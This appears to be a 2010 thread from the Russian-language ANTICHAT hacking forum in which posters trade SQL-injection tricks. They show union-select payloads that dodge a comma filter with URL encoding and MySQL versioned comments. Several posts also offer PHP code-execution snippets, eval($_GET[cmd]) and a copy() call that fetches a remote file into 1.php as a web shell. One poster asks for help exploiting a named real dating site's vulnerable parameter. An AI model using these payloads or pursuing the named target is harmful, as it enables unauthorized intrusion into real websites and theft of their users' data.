ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.05.2010, 11:36
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
PHP код:
copy('http://2.ru/1.txt', '1.php');
|
|
|
22.05.2010, 12:23
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:
index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+
или как-то через скобки?
Уже столько вариантов перепробовал, и не знаю что делать.
|
|
|
|
22.05.2010, 12:47
|
|
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601
Репутация:
110
|
|
Сообщение от Sams
Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:
index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+
или как-то через скобки?
Уже столько вариантов перепробовал, и не знаю что делать.
0x2c
upd, ступил, думал тебе в переменную надо)
Последний раз редактировалось crystalbit; 22.05.2010 в 12:50..
|
|
|
|
22.05.2010, 12:30
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Ребята, помогите, очень нужна помощь. Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример: index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+ или как-то через скобки? Уже столько вариантов перепробовал, и не знаю что делать.
попробуй:
index.php?id=-999+union+select+1%2С2%2С3--
|
|
|
|
22.05.2010, 12:41
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Через %2С не прокатило  |
|
|
|
22.05.2010, 12:48
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
тогда так:
index.php?id=-999+union+select+1/*!,*/2/*!,*/3--
можно и так
если версия mysql 5
index.php?id=-999+union+select+1/*!12345,*/2/*!12345,*/3--
4 версия
index.php?id=-999+union+select+1/*!1234,*/2/*!1234,*/3--
etc...
Последний раз редактировалось pinch; 22.05.2010 в 12:51..
|
|
|
|
22.05.2010, 13:09
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
что-то нехватает фантазии раскрутить:
http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
|
|
|
|
22.05.2010, 13:32
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
CTAPu4OK
eval($_GET[cmd]); пробовал?
|
|
|
|
22.05.2010, 13:44
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от GOGA075
CTAPu4OK
eval($_GET[cmd]); пробовал?
Скрипт не пашет
Но это получится вот так
eval($_GET[cmd]);
exit;
т.е. если бы он и заработал, я все равно бы нечего не смог сделать) после каждого выполнения скрипта exit; закрывает работу со скриптом, а без exit; експлойт не пашет =(((
Я уже 2 дня над этим парюсь(
|
|
|
|
22.05.2010, 13:56
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
что-то нехватает фантазии раскрутить: http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
